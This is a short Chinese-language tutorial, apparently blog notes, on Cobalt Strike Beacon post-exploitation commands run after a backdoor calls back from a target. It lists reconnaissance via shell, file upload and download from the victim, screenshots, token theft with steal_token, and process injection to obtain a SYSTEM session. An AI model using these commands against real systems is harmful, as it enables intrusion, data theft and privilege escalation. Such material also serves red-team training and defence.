参考:https://longwaer.blog.csdn.net/article/details/122880607
Beacon命令使用
命令查看
当我们通过生成的后门在目标机上运行后返回一个shell,同样可以使用命令进行信息收集:
sleep 0 #将这个回连的间隔设置为0,因为CS中默认回连是60秒一次交互。
shell whoami ipconfig hostname #等等这些cmd执行命令,我们都需要在面前加上shell。
CS中的基础命令,可以通过help
来进行查看,当需要知道单个命令的作用,同样可以利用help查看:
help
help shell #查看shell命令的作用
上传下载
这些命令我们也可以通过图形化界面进行点击,例如我们上传文件:
upload 文件路径\文件名
下载文件
我们同样可以在目标机下载文件,
download 文件名
下载完成后,需要在下载列表中再将文件下载到本地:
截屏、令牌窃取
使用截屏功能:
screenshot #截屏
令牌窃取和进程注入
进程列表中,我们就可以使用令牌窃取和进程注入:
steal_token PID #令牌窃取
inject PID #进程注入
可以看出当注入system进程后,这里会多返回一个system权限的会话: